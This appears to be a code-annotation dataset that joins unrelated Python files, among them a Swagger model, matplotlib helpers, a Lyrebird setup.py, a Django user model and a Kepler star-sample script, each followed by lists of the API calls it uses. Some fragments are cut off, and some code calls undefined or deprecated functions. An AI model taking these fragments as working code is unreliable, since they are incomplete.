'events': 'float',
'event_i_ds': 'list[str]'
}
attribute_map = {
'id': 'ID',
'events': 'Events',
'event_i_ds': 'EventIDs'
}
def __init__(self, id=None, events=None, event_i_ds=None):
"""
AlertEvents - a model defined in Swagger
"""
self._id = None
self._events = None
self._event_i_ds = None
if id is not None:
self.id = id
if events is not None:
self.events = events
if event_i_ds is not None:
self.event_i_ds = event_i_ds
@property
def id(self):
"""
Gets the id of this AlertEvents.
Position of this event (basically an array key)
:return: The id of this AlertEvents.
:rtype: float
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this AlertEvents.
Position of this event (basically an array key)
:param id: The id of this AlertEvents.
:type: float
"""
self._id = id
@property
def events(self):
"""
Gets the events of this AlertEvents.
Number of events in this time period
:return: The events of this AlertEvents.
:rtype: float
"""
return self._events
@events.setter
def events(self, events):
"""
Sets the events of this AlertEvents.
Number of events in this time period
:param events: The events of this AlertEvents.
:type: float
"""
self._events = events
@property
def event_i_ds(self):
"""
Gets the event_i_ds of this AlertEvents.
12 character internal hexadecimal identifiers for Events in this time period
:return: The event_i_ds of this AlertEvents.
:rtype: list[str]
"""
return self._event_i_ds
@event_i_ds.setter
def event_i_ds(self, event_i_ds):
"""
Sets the event_i_ds of this AlertEvents.
12 character internal hexadecimal identifiers for Events in this time period
:param event_i_ds: The event_i_ds of this AlertEvents.
:type: list[str]
"""
self._event_i_ds = event_i_ds
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, AlertEvents):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"six.iteritems"
] | [((3539, 3568), 'six.iteritems', 'iteritems', (['self.swagger_types'], {}), '(self.swagger_types)\n', (3548, 3568), False, 'from six import iteritems\n')] |
'''
Different utils used by plotters.
'''
import mpl_toolkits.basemap as bm
import matplotlib.pyplot as pl
from matplotlib import colors, cm
import scipy as sp
# Make spectral plot
def my_psd(x):
P,f=pl.psd(x); pl.clf()
T=2./f; ind= T>=12.
pl.plot(T[ind]/12,P[ind]);
ax=pl.gca();
ax.set_xscale('log');
#ax.set_xlim(1,20); ax.set_ylim(0,20);
#tick=[1,2,3,5,10,20]; tickl=[str(i) for i in tick]
#ax.set_xticks(tick); ax.set_xticklabels(tickl);
ax.set_xlabel('Period, years'); ax.set_ylabel('Power');
ax.set_title('Power spectral density');
# Contour plot
def contour(x,y,z,func=pl.contourf,black=None,**opts):
'''
Adds a "black" functionality to default contour function
'''
if black!=None:
clevs=opts.get('levels',None)
if clevs != None:
min=clevs[0]; max=clevs[-1]
else:
min=sp.ma.minimum(z); max=sp.ma.maximum(z)
norm=opts.get('norm',colors.normalize(min,max));
cmap=opts.get('cmap',MyCmap(cm.get_cmap(),black=norm(black)))
opts['norm']=norm; opts['cmap']=cmap
cs=func(x,y,z,**opts)
return cs
| [
"matplotlib.colors.normalize",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.psd",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.plot",
"scipy.ma.maximum",
"scipy.ma.minimum",
"matplotlib.cm.get_cmap"
] | [((206, 215), 'matplotlib.pyplot.psd', 'pl.psd', (['x'], {}), '(x)\n', (212, 215), True, 'import matplotlib.pyplot as pl\n'), ((217, 225), 'matplotlib.pyplot.clf', 'pl.clf', ([], {}), '()\n', (223, 225), True, 'import matplotlib.pyplot as pl\n'), ((254, 282), 'matplotlib.pyplot.plot', 'pl.plot', (['(T[ind] / 12)', 'P[ind]'], {}), '(T[ind] / 12, P[ind])\n', (261, 282), True, 'import matplotlib.pyplot as pl\n'), ((288, 296), 'matplotlib.pyplot.gca', 'pl.gca', ([], {}), '()\n', (294, 296), True, 'import matplotlib.pyplot as pl\n'), ((888, 904), 'scipy.ma.minimum', 'sp.ma.minimum', (['z'], {}), '(z)\n', (901, 904), True, 'import scipy as sp\n'), ((910, 926), 'scipy.ma.maximum', 'sp.ma.maximum', (['z'], {}), '(z)\n', (923, 926), True, 'import scipy as sp\n'), ((956, 982), 'matplotlib.colors.normalize', 'colors.normalize', (['min', 'max'], {}), '(min, max)\n', (972, 982), False, 'from matplotlib import colors, cm\n'), ((1020, 1033), 'matplotlib.cm.get_cmap', 'cm.get_cmap', ([], {}), '()\n', (1031, 1033), False, 'from matplotlib import colors, cm\n')] |
#!/usr/bin/env python
"""
Lyrebird Voice Changer
Simple and powerful voice changer for Linux, written in GTK 3
(c) Charlotte 2020
"""
import sys
import re
from setuptools import setup
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('app/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
VERSION = match.group(1)
else:
raise RuntimeError("No version number found!")
with open("requirements.txt") as f:
required = [l for l in f.read().splitlines() if not l.startswith("#")]
extra_options = dict(
name = 'Lyrebird',
version=VERSION,
author = 'Charlotte',
# author_email = '',
url = 'https://github.com/charpointer/lyrebird',
description = 'Simple and powerful voice changer for Linux, written in GTK 3',
download_url = 'https://github.com/charpointer/lyrebird/releases',
license = 'MIT License',
install_requires=required,
entry_points = {
'console_scripts': [
'lyrebird = app.__main__:main']},
packages = ['app',
'app.core'],
)
setup(**extra_options)
| [
"setuptools.setup",
"re.search"
] | [((1102, 1124), 'setuptools.setup', 'setup', ([], {}), '(**extra_options)\n', (1107, 1124), False, 'from setuptools import setup\n'), ((311, 341), 're.search', 're.search', (['version_regex', 'text'], {}), '(version_regex, text)\n', (320, 341), False, 'import re\n')] |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from helusers.models import AbstractUser
class User(AbstractUser):
is_official = models.BooleanField(verbose_name=_("official"), default=False)
class Meta:
verbose_name = _("user")
verbose_name_plural = _("users")
ordering = ("id",)
def can_view_contract_zone_details(user):
return user.is_authenticated and user.is_official
| [
"django.utils.translation.ugettext_lazy"
] | [((275, 284), 'django.utils.translation.ugettext_lazy', '_', (['"""user"""'], {}), "('user')\n", (276, 284), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((315, 325), 'django.utils.translation.ugettext_lazy', '_', (['"""users"""'], {}), "('users')\n", (316, 325), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((205, 218), 'django.utils.translation.ugettext_lazy', '_', (['"""official"""'], {}), "('official')\n", (206, 218), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import glob,os,csv,re,math
import shutil, time
from astropy.io import ascii
import matplotlib.pyplot as plt
# Load all data files:
psdir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/'
hrdir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/'
# Original directories:
pande_dir='/Users/maryumsayeed/Desktop/pande/pande_lcs/'
ast_dir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/data/large_train_sample/'
# Directories when testing sections of lightcurves:
# pande_dir='/Users/maryumsayeed/Desktop/pande/pande_lcs_third/'
# ast_dir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/data/large_train_sample_third/'
pande_lcs =glob.glob(pande_dir+'*.fits')
ast_lcs =glob.glob(ast_dir+'*.fits')
print('# of Pande .ps files:',len(glob.glob(pande_dir+'*.ps')))
print('# of Pande .fits files:',len(glob.glob(pande_dir+'*.fits')))
print('# of Astero. .ps files:',len(glob.glob(ast_dir+'*.ps')))
print('# of Astero. .fits files:',len(glob.glob(ast_dir+'*.fits')))
# Load Berger+ stellar properties catalogues:
gaia =ascii.read('/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt',delimiter='&')
gaia =gaia[gaia['binaryFlag']==0] #remove any binaries
kepler_catalogue=pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv')#,skiprows=1,delimiter=',',usecols=[0,1])
# Get Kps for all stars:
kpfile ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/KIC_Kepmag_Berger2018.csv'
kp_all =pd.read_csv(kpfile,usecols=['KIC','kic_kepmag'])
# # Load Asteroseismic Samples:
# Don't want to include any Mathur sample:
mathur_header=['KIC','loggi','e_loggi','r_loggi','n_loggi','logg','E_logg','e_logg','Mass','E_Mass','e_Mass']
mathur_2017 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt',delimiter=';',skiprows=54,names=mathur_header)
mathur_2017 =mathur_2017[mathur_2017['n_loggi']=='AST'] #include only asteroseismic measurements
yu_header=['KICID','Teff','err','logg','logg_err','Fe/H','err','M_noCorrection','M_nocorr_err','R_noCorrection','err','M_RGB','M_RGB_err','R_RGB','err','M_Clump','M_Clump_err','R_Clump','err','EvoPhase']
yu_2018 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt',delimiter='|',names=yu_header,skiprows=1,index_col=False)#,names=yu_header)
#chaplin_2014=pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/Chaplin_2014.txt',skiprows=47,delimiter='\t',names=chaplin_header)
#huber_2013 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/Huber_2013.txt',delimiter='\t',skiprows=37,names=['KIC','Mass','Mass_err'])
mathur_kics=np.array(mathur_2017['KIC'])
yu_kics=np.array(yu_2018['KICID'])
#chaplin_kics=np.array(chaplin_2014['KIC'])
#huber_kics=np.array(huber_2013['KIC'])
print('# of stars in Yu+2018:',len(yu_kics))
print('# of stars in Mathur+17:',len(mathur_kics))
astero_kics=np.concatenate([mathur_kics,yu_kics])
astero_kics=np.array(list(set(astero_kics)))
print('Total seismic stars:',len(astero_kics))
# # Load Pande sample:
pande =pd.read_csv('/Users/maryumsayeed/Desktop/pande/pande_granulation.txt')#,skiprows=1,usecols=[0],dtype=int,delimiter=',')
pande_kics=list(pande['#KIC'])
print('# of stars in Pande+2018:',len(pande))
# If star in both sample, treat it as asteroseismic star to increase ast. sample.
# If star only in Pande sample, keep it there.
# If star only in ast. sample, keep it there.
pande_stars0=(set(pande_kics) - set(astero_kics))
print('# stars only in Pande+ and not astero',len(pande_stars0))
print('# total astero. stars:',len(astero_kics))
print('# stars in both Pande+ and astero catalogues:',len(list(set(pande_kics) & set(astero_kics))))
# # Get catalogues of non-granulation stars:
not_dir='/Users/maryumsayeed/Desktop/HuberNess/mlearning/ACFcannon-master/not_granulation_star/'
dscutis =np.loadtxt(not_dir+'murphy_dscuti.txt',usecols=[0,-1],delimiter=',',skiprows=1,dtype=int)
idx=np.where(dscutis[:,1]==1)[0] #stars that have dSct flag
dscutis =dscutis[idx][:,0]
binaries =np.loadtxt(not_dir+'ebinary.txt',usecols=[0],dtype=int,delimiter=',')
exoplanets =pd.read_csv(not_dir+'koi_planethosts.csv',skiprows=53,usecols=['kepid','koi_disposition','koi_pdisposition'])
#exoplanets=exoplanets[exoplanets['koi_pdisposition']!='FALSE POSITIVE'] # Remove false positive exoplanets:
exoplanets =[int(i) for i in list(exoplanets['kepid'])]
superflares=np.loadtxt(hrdir+'superflares_shibayama2013.txt',skiprows=33,usecols=[0],dtype=int)
superflares=[int(i) for i in list(superflares)]
flares =list(np.loadtxt(not_dir+'flares_davenport2016.txt',usecols=[0],skiprows=1,delimiter=',',dtype=int))
rotating =list(np.loadtxt(not_dir+'mcquillan_rotation.txt',usecols=[0],skiprows=1,delimiter=',',dtype=int))
clas =ascii.read(not_dir+'debosscher2011.dat')
gdor =clas[(clas['V1'] == 'GDOR') | (clas['V1'] == 'SPB')]
gdor =[int(i) for i in list(gdor['KIC'])]
dscutis2 =clas[clas['V1'] == 'DSCUT']
dscutis2 =[int(i) for i in list(dscutis2['KIC'])]
rrlyr =pd.read_csv(not_dir+'rrlyr.txt')
rrlyr =[int(i) for i in list(rrlyr['kic'])]
# # Remove non-granulation stars:
pande_stars=list(set(pande_stars0)-set(binaries)-set(exoplanets)-set(flares)-set(rotating) -set(superflares)-set(dscutis)-set(dscutis2)-set(gdor)-set(rrlyr))
astero_stars=list(set(astero_kics)-set(binaries)-set(exoplanets)-set(flares)-set(rotating) -set(superflares)-set(dscutis)-set(dscutis2)-set(gdor)-set(rrlyr))
print('# of non-granulation stars removed from astero sample:',len(astero_kics)-len(astero_stars))
print('# of non-granulation stars removed from pande sample:',len(pande_stars0)-len(pande_stars))
# Only get stars in Gaia catalogue (Berger+2018):
print('(before cross-referenced with Gaia) # of Pande stars:',len(pande_stars))
print('(before cross-referenced with Gaia) # of Astero. stars:',len(astero_stars))
pande_stars = list((set(pande_stars) & set(gaia['KIC'])))
astero_stars = list((set(astero_stars) & set(gaia['KIC'])))
print('final # of Pande stars:',len(pande_stars))
print('final # of asteroseismic stars:',len(astero_stars))
# Check if all Pande stars have a light curve downloaded :
print('\n','===== PANDE =====')
pande_kics_downloaded=[]
for file in pande_lcs:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
pande_kics_downloaded.append(kic)
print('These should be the same:')
print('---Stars downloaded:',len(pande_kics_downloaded))
print('---Stars needed:',len(pande_stars))
if len(pande_kics_downloaded) > len(pande_stars):
print('We have more stars downloaded than we need from Pande+18.')
else:
print("Don't have all the stars that we need. Download more!")
# Only use Pande stars we have downloaded:
#pande_stars = list(set(set(pande_stars)-set(pande_not_downloaded)))
pande_below_dc=ascii.read(psdir+'LLR_gaia/pande_kics_below_duty_cycle.txt',names=['KICID'])
pande_below_89=ascii.read(psdir+'LLR_gaia/pande_kics_below_89_days.txt',names=['KICID'])
pande_below_dc,pande_below_89=pande_below_dc['KICID'],pande_below_89['KICID']
pande_not_downloaded =[]
pande_stars_downloaded=[]
for kic in pande_stars:
if kic in pande_kics_downloaded:
pande_stars_downloaded.append(kic)
else:
pande_not_downloaded.append(kic)
print('Need from Pande+18',len(pande_stars))
print('Downloaded',len(pande_stars_downloaded))
print('Have but removed aka:')
print('---# of Pande stars below 89 days',len(pande_below_89))
print('---# of Pande stars below duty cycle',len(pande_below_dc))
print('Pande not downloaded',len(pande_not_downloaded))
print('Good pande stars',len(pande_stars))
# Check if all astero. stars have a light curve downloaded :
print('\n','===== ASTERO. =====')
ast_kics_downloaded=[]
for file in ast_lcs:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
ast_kics_downloaded.append(kic)
print('These should be the same:')
print('---Stars downloaded:',len(ast_kics_downloaded))
print('---Stars needed:',len(astero_stars))
if len(ast_kics_downloaded) > len(astero_stars):
print('We have more stars downloaded than we need from astero catalogues.')
else:
print("Don't have all the stars that we need. Download more!")
astero_below_dc=ascii.read(psdir+'LLR_seismic/astero_kics_below_duty_cycle.txt',names=['KICID'])
astero_below_89=ascii.read(psdir+'LLR_seismic/astero_kics_below_89_days.txt',names=['KICID'])
astero_below_dc,astero_below_89=astero_below_dc['KICID'],astero_below_89['KICID']
astero_not_downloaded =[]
astero_stars_downloaded=[]
for kic in astero_stars:
if kic in ast_kics_downloaded:
astero_stars_downloaded.append(kic)
else:
astero_not_downloaded.append(kic)
print('Need from catalogues',len(astero_stars))
print('Downloaded',len(ast_kics_downloaded))
print('Have but removed aka:')
print('---# of astero stars below 89 days',len(astero_below_89))
print('---# of astero stars below duty cycle',len(astero_below_dc))
print('Astero not downloaded',len(astero_not_downloaded))
print('Good astero stars',len(astero_stars))
# In[13]:
# ascii.write([astero_stars],psdir+'astero_stars_we_need.txt',overwrite=True)
# ascii.write([ast_kics_downloaded],psdir+'astero_stars_downloaded.txt',overwrite=True)
# ascii.write([good_astero_stars],psdir+'good_stars_downloaded.txt',overwrite=True)
fn='/Users/maryumsayeed/Downloads/'
# np.savetxt(fn+'pande_not_downloaded.txt',pande_not_downloaded,fmt='%s')
# np.savetxt(fn+'astero_not_downloaded.txt',astero_not_downloaded,fmt='%s')
# # Find logg for Pande:
print('\n','Getting logg for Pande. stars...')
pande_ps=glob.glob(pande_dir+'*.ps')
pande_no_logg=0
pande_final_sample=[]
pande_loggs=[]
check_dups=[]
for file in pande_ps:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic in pande_stars:
row=kepler_catalogue.loc[kepler_catalogue['KIC']==kic]
logg=row['iso_logg'].item()
if math.isnan(logg) is False: # check to see there are no nan loggs
logg_pos_err=row['iso_logg_err1']
logg_neg_err=row['iso_logg_err2']
pande_final_sample.append([file,logg])
pande_loggs.append(logg)
else:
pande_no_logg+=1
else:
continue
print('Pande w/ no logg:',pande_no_logg)
# Double check all these stars are in Pande:
kic_not_in_pande=[]
for i in pande_final_sample:
file=i[0]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic not in pande_kics:
kic_not_in_pande.append(kic)
print('# stars not in Pande.',len(kic_not_in_pande))
print('# Pande stars to save:',len(pande_final_sample))
diff=2000
# np.savetxt(psdir+'pande_final_sample_full.txt',pande_final_sample,fmt='%s')
# np.savetxt(psdir+'pande_pickle_1.txt',pande_final_sample[0:2000],fmt='%s')
# np.savetxt(psdir+'pande_pickle_2.txt',pande_final_sample[2000:4000],fmt='%s')
# np.savetxt(psdir+'pande_pickle_3.txt',pande_final_sample[4000:],fmt='%s')
# # Find logg for Astero. stars:
print('\n','Getting logg for Astero. stars...')
astero_ps=glob.glob(ast_dir+'*.ps')
files,loggs=[],np.zeros(len(astero_ps))
c1,c2,c3,none=0,0,0,0
for i in range(0,len(astero_ps)):
file=astero_ps[i]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic in astero_stars:
if kic in yu_kics:
row=yu_2018.loc[yu_2018['KICID']==kic]
logg =row['logg'].item()
c1+=1
elif kic in mathur_kics:
row =mathur_2017.loc[mathur_2017['KIC']==kic]
logg =row['loggi'].item()
c2+=1
else:
none+=1
loggs[i]=logg
files.append(file)
# astero_final_sample.append([file,logg])
# astero_loggs.append(logg)
else:
continue
files,loggs=np.array(files),np.array(loggs).astype(float)
print('Yu+:',c1,'Mathur+',c2,'None',none)
idx=np.where(loggs>0)[0] #aka select valid stars
astero_files,astero_loggs=files[idx],loggs[idx]
astero_final_sample=np.array([astero_files,astero_loggs]).T
# Double check all these stars are in Pande:
kic_not_in_astero=[]
for i in astero_final_sample:
file=i[0]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic not in astero_stars:
kic_not_in_astero.append(kic)
print('# stars not in Astero.',len(kic_not_in_astero))
print('# Astero. stars to save:',len(astero_final_sample))
diff=4000
# np.savetxt(psdir+'astero_final_sample_full.txt',astero_final_sample,fmt='%s')
# np.savetxt(psdir+'astero_final_sample_1.txt',astero_final_sample[0:4000],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_2.txt',astero_final_sample[4000:4000+diff],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_3.txt',astero_final_sample[8000:8000+diff],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_4.txt',astero_final_sample[12000:12000+diff],fmt='%s')
| [
"pandas.read_csv",
"numpy.where",
"math.isnan",
"numpy.array",
"numpy.concatenate",
"numpy.loadtxt",
"astropy.io.ascii.read",
"glob.glob",
"re.search"
] | [((790, 821), 'glob.glob', 'glob.glob', (["(pande_dir + '*.fits')"], {}), "(pande_dir + '*.fits')\n", (799, 821), False, 'import glob, os, csv, re, math\n'), ((835, 864), 'glob.glob', 'glob.glob', (["(ast_dir + '*.fits')"], {}), "(ast_dir + '*.fits')\n", (844, 864), False, 'import glob, os, csv, re, math\n'), ((1184, 1301), 'astropy.io.ascii.read', 'ascii.read', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt"""'], {'delimiter': '"""&"""'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt'\n , delimiter='&')\n", (1194, 1301), False, 'from astropy.io import ascii\n'), ((1368, 1470), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv"""'], {}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv'\n )\n", (1379, 1470), True, 'import pandas as pd\n'), ((1635, 1685), 'pandas.read_csv', 'pd.read_csv', (['kpfile'], {'usecols': "['KIC', 'kic_kepmag']"}), "(kpfile, usecols=['KIC', 'kic_kepmag'])\n", (1646, 1685), True, 'import pandas as pd\n'), ((1885, 2033), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt"""'], {'delimiter': '""";"""', 'skiprows': '(54)', 'names': 'mathur_header'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt'\n , delimiter=';', skiprows=54, names=mathur_header)\n", (1896, 2033), True, 'import pandas as pd\n'), ((2336, 2489), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt"""'], {'delimiter': '"""|"""', 'names': 'yu_header', 'skiprows': '(1)', 'index_col': '(False)'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt',\n delimiter='|', names=yu_header, skiprows=1, index_col=False)\n", (2347, 2489), True, 'import pandas as pd\n'), ((2823, 2851), 'numpy.array', 'np.array', (["mathur_2017['KIC']"], {}), "(mathur_2017['KIC'])\n", (2831, 2851), True, 'import numpy as np\n'), ((2860, 2886), 'numpy.array', 'np.array', (["yu_2018['KICID']"], {}), "(yu_2018['KICID'])\n", (2868, 2886), True, 'import numpy as np\n'), ((3080, 3118), 'numpy.concatenate', 'np.concatenate', (['[mathur_kics, yu_kics]'], {}), '([mathur_kics, yu_kics])\n', (3094, 3118), True, 'import numpy as np\n'), ((3246, 3316), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/pande/pande_granulation.txt"""'], {}), "('/Users/maryumsayeed/Desktop/pande/pande_granulation.txt')\n", (3257, 3316), True, 'import pandas as pd\n'), ((4044, 4144), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'murphy_dscuti.txt')"], {'usecols': '[0, -1]', 'delimiter': '""","""', 'skiprows': '(1)', 'dtype': 'int'}), "(not_dir + 'murphy_dscuti.txt', usecols=[0, -1], delimiter=',',\n skiprows=1, dtype=int)\n", (4054, 4144), True, 'import numpy as np\n'), ((4236, 4310), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'ebinary.txt')"], {'usecols': '[0]', 'dtype': 'int', 'delimiter': '""","""'}), "(not_dir + 'ebinary.txt', usecols=[0], dtype=int, delimiter=',')\n", (4246, 4310), True, 'import numpy as np\n'), ((4318, 4437), 'pandas.read_csv', 'pd.read_csv', (["(not_dir + 'koi_planethosts.csv')"], {'skiprows': '(53)', 'usecols': "['kepid', 'koi_disposition', 'koi_pdisposition']"}), "(not_dir + 'koi_planethosts.csv', skiprows=53, usecols=['kepid',\n 'koi_disposition', 'koi_pdisposition'])\n", (4329, 4437), True, 'import pandas as pd\n'), ((4606, 4699), 'numpy.loadtxt', 'np.loadtxt', (["(hrdir + 'superflares_shibayama2013.txt')"], {'skiprows': '(33)', 'usecols': '[0]', 'dtype': 'int'}), "(hrdir + 'superflares_shibayama2013.txt', skiprows=33, usecols=[0\n ], dtype=int)\n", (4616, 4699), True, 'import numpy as np\n'), ((4972, 5014), 'astropy.io.ascii.read', 'ascii.read', (["(not_dir + 'debosscher2011.dat')"], {}), "(not_dir + 'debosscher2011.dat')\n", (4982, 5014), False, 'from astropy.io import ascii\n'), ((5230, 5264), 'pandas.read_csv', 'pd.read_csv', (["(not_dir + 'rrlyr.txt')"], {}), "(not_dir + 'rrlyr.txt')\n", (5241, 5264), True, 'import pandas as pd\n'), ((7017, 7096), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_gaia/pande_kics_below_duty_cycle.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_gaia/pande_kics_below_duty_cycle.txt', names=['KICID'])\n", (7027, 7096), False, 'from astropy.io import ascii\n'), ((7109, 7185), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_gaia/pande_kics_below_89_days.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_gaia/pande_kics_below_89_days.txt', names=['KICID'])\n", (7119, 7185), False, 'from astropy.io import ascii\n'), ((8424, 8512), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_seismic/astero_kics_below_duty_cycle.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_seismic/astero_kics_below_duty_cycle.txt', names=[\n 'KICID'])\n", (8434, 8512), False, 'from astropy.io import ascii\n'), ((8521, 8606), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_seismic/astero_kics_below_89_days.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_seismic/astero_kics_below_89_days.txt', names=['KICID']\n )\n", (8531, 8606), False, 'from astropy.io import ascii\n'), ((9784, 9813), 'glob.glob', 'glob.glob', (["(pande_dir + '*.ps')"], {}), "(pande_dir + '*.ps')\n", (9793, 9813), False, 'import glob, os, csv, re, math\n'), ((11142, 11169), 'glob.glob', 'glob.glob', (["(ast_dir + '*.ps')"], {}), "(ast_dir + '*.ps')\n", (11151, 11169), False, 'import glob, os, csv, re, math\n'), ((4138, 4166), 'numpy.where', 'np.where', (['(dscutis[:, 1] == 1)'], {}), '(dscutis[:, 1] == 1)\n', (4146, 4166), True, 'import numpy as np\n'), ((4755, 4858), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'flares_davenport2016.txt')"], {'usecols': '[0]', 'skiprows': '(1)', 'delimiter': '""","""', 'dtype': 'int'}), "(not_dir + 'flares_davenport2016.txt', usecols=[0], skiprows=1,\n delimiter=',', dtype=int)\n", (4765, 4858), True, 'import numpy as np\n'), ((4867, 4968), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'mcquillan_rotation.txt')"], {'usecols': '[0]', 'skiprows': '(1)', 'delimiter': '""","""', 'dtype': 'int'}), "(not_dir + 'mcquillan_rotation.txt', usecols=[0], skiprows=1,\n delimiter=',', dtype=int)\n", (4877, 4968), True, 'import numpy as np\n'), ((11880, 11895), 'numpy.array', 'np.array', (['files'], {}), '(files)\n', (11888, 11895), True, 'import numpy as np\n'), ((11973, 11992), 'numpy.where', 'np.where', (['(loggs > 0)'], {}), '(loggs > 0)\n', (11981, 11992), True, 'import numpy as np\n'), ((12086, 12124), 'numpy.array', 'np.array', (['[astero_files, astero_loggs]'], {}), '([astero_files, astero_loggs])\n', (12094, 12124), True, 'import numpy as np\n'), ((897, 926), 'glob.glob', 'glob.glob', (["(pande_dir + '*.ps')"], {}), "(pande_dir + '*.ps')\n", (906, 926), False, 'import glob, os, csv, re, math\n'), ((963, 994), 'glob.glob', 'glob.glob', (["(pande_dir + '*.fits')"], {}), "(pande_dir + '*.fits')\n", (972, 994), False, 'import glob, os, csv, re, math\n'), ((1031, 1058), 'glob.glob', 'glob.glob', (["(ast_dir + '*.ps')"], {}), "(ast_dir + '*.ps')\n", (1040, 1058), False, 'import glob, os, csv, re, math\n'), ((1097, 1126), 'glob.glob', 'glob.glob', (["(ast_dir + '*.fits')"], {}), "(ast_dir + '*.fits')\n", (1106, 1126), False, 'import glob, os, csv, re, math\n'), ((6466, 6494), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (6475, 6494), False, 'import glob, os, csv, re, math\n'), ((7979, 8007), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (7988, 8007), False, 'import glob, os, csv, re, math\n'), ((9906, 9934), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (9915, 9934), False, 'import glob, os, csv, re, math\n'), ((10086, 10102), 'math.isnan', 'math.isnan', (['logg'], {}), '(logg)\n', (10096, 10102), False, 'import glob, os, csv, re, math\n'), ((10496, 10524), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (10505, 10524), False, 'import glob, os, csv, re, math\n'), ((11294, 11322), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (11303, 11322), False, 'import glob, os, csv, re, math\n'), ((11896, 11911), 'numpy.array', 'np.array', (['loggs'], {}), '(loggs)\n', (11904, 11911), True, 'import numpy as np\n'), ((12246, 12274), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (12255, 12274), False, 'import glob, os, csv, re, math\n')] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/TechLaProvence/lp_mongodb
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 figarocms <EMAIL>
from tornado.concurrent import return_future
from lp_mongodb.storages.mongo_storage import Storage
from thumbor.context import Context
from thumbor.config import Config
@return_future
def load(context, path, callback):
